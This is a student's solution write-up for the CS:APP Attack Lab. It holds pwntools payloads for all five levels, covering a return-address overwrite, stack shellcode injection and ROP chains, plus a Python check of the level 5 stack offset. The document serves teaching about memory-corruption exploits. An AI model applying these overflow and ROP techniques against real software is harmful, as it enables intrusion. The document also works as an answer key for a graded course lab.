csapp attack lab


level1

Just overwrite the return address and jump straight there. Payload:

from pwn import *
context.arch = 'amd64'          # needed for asm() in the later levels

payload1 = b'a'*0x28 + p64(0x04017C0)   # 0x28 bytes of filler, then return into touch1

level2

This time an argument has to be passed. The program hands us an rwx segment, so this is ret2shellcode: write a small gadget of our own on the stack and ret to it. Payload:

payload2  = asm('mov rdi, 0x59b997fa')    # rdi = cookie, the argument touch2 expects
payload2 += asm('ret')                    # ret pops the next qword, i.e. touch2
payload2  = payload2.ljust(0x28, b'\x00') # pad up to the saved return address
payload2 += p64(0x5561dc78)               # return into the shellcode at the buffer start
payload2 += p64(0x4017ec)                 # touch2

level3

Now the argument is passed by reference. I chose to put the string first and then pass its address. Payload:

# The string must be NUL-terminated: hexmatch compares 9 bytes with strncmp,
# so it is padded to 0x10 bytes and the code is placed after it at buffer+0x10.
payload3  = b'59b997fa\x00'.ljust(0x10, b'\x00')
payload3 += asm('mov rdi, 0x5561dc78')    # rdi = address of the string (buffer start)
payload3 += asm('ret')                    # ret pops the next qword, i.e. touch3
payload3  = payload3.ljust(0x28, b'\x00') # pad up to the saved return address
payload3 += p64(0x5561dc88)               # return into the code at buffer+0x10 (0x5561dc78 + 0x10)
payload3 += p64(0x04018fa)                # touch3

level4

There is no fixed rwx segment any more, so it has to be ROP, but it is still fairly simple: find a pop rdi; ret gadget and that is it. Exploit:

rdi_ret = 0x000000000040141b             # pop rdi; ret
rsi = 0x401383                           # gadget that pops the next qword into rsi (used in level 5)
cookie = 0x59b997fa
payload4 = b'a'*0x28 + p64(rdi_ret) + p64(cookie) + p64(0x4017ec)   # rdi = cookie, then touch2

level5

The idea clearly is not to leak a stack address; instead the stack contents have to be addressed relative to rbp or rsp. This function in the gadget farm does the job:

00000000004019d6 <add_xy>:
  4019d6:	48 8d 04 37          	lea    (%rdi,%rsi,1),%rax
  4019da:	c3                   	retq

Find a way to get rsp into rdi, then control the offset. Payload:

# rsp2rax / rax2rdi: addresses of the mov %rsp,%rax and mov %rax,%rdi gadgets
# (the post uses the names without listing the addresses)
payload5  = b'59b997fa' + b'\x00'*0x20   # cookie string, NUL-terminated, filling the 0x28 bytes
payload5 += p64(rsi)                     # gadget that pops the next qword into rsi
payload5 += p64(18446744073709551552)    # -64 as unsigned 64-bit: the string sits 0x40 bytes below rsp
payload5 += p64(rsp2rax) + p64(rax2rdi)  # rdi = rsp
payload5 += p64(0x4019d6)                # add_xy: rax = rdi + rsi = address of the string
payload5 += p64(rax2rdi)                 # rdi = rax
payload5 += p64(0x4018fa)                # touch3
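To check the arithmetic behind that -64, here is an added example (Python, not code from the original post) that walks the level 5 chain slot by slot while tracking rsp the way the CPU does. It assumes the buffer sits at 0x5561dc78 as in the earlier levels and uses the gadget names only as labels, since the post gives no addresses for rsp2rax and rax2rdi.

```python
# Added example (not the post's code): walk the level-5 chain slot by slot,
# tracking rsp as the CPU does, to see why the qword popped into rsi is -64.
MASK = (1 << 64) - 1
BUF_LEN = 0x28          # bytes from buffer start to the saved return address
BUF_BASE = 0x5561dc78   # buffer address from the earlier levels (assumed)
# Stack slots in order: (label, value). Labels stand in for the gadget
# addresses the post uses; only 'data' slots carry a value.
LEVEL5_CHAIN = [
    ('pop_rsi', None),
    ('data', 18446744073709551552),   # 0xFFFFFFFFFFFFFFC0
    ('rsp2rax', None),                # mov %rsp,%rax
    ('rax2rdi', None),                # mov %rax,%rdi
    ('add_xy', None),                 # lea (%rdi,%rsi,1),%rax
    ('rax2rdi', None),
    ('touch3', None),
]

def to_signed64(x):
    """Interpret an unsigned 64-bit value as two's complement."""
    x &= MASK
    return x - (1 << 64) if x >> 63 else x

def simulate_chain(buf_base, chain):
    """Return the rdi that touch3 receives, tracking rsp through each ret."""
    sp = buf_base + BUF_LEN     # rsp when getbuf's own ret executes
    rax = rdi = rsi = 0
    i = 0
    while i < len(chain):
        label = chain[i][0]
        sp += 8                 # the ret pops this slot and enters the gadget
        i += 1
        if label == 'pop_rsi':
            rsi = chain[i][1] & MASK
            sp += 8             # the pop consumes the data slot
            i += 1
        elif label == 'rsp2rax':
            rax = sp            # rsp already points past the gadget's own slot
        elif label == 'rax2rdi':
            rdi = rax
        elif label == 'add_xy':
            rax = (rdi + rsi) & MASK
        elif label == 'touch3':
            return rdi
        else:
            raise ValueError(f'unknown slot {label}')
    raise RuntimeError('chain ended before touch3')

def required_rsi(chain, string_offset=0):
    """rsi value that makes add_xy point at the string at buffer+string_offset."""
    idx = next(i for i, s in enumerate(chain) if s[0] == 'rsp2rax')
    return (string_offset - (BUF_LEN + 8 * (idx + 1))) & MASK
```

required_rsi() solves the other direction: from the position of rsp2rax in the chain it yields the value the payload hard-codes.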
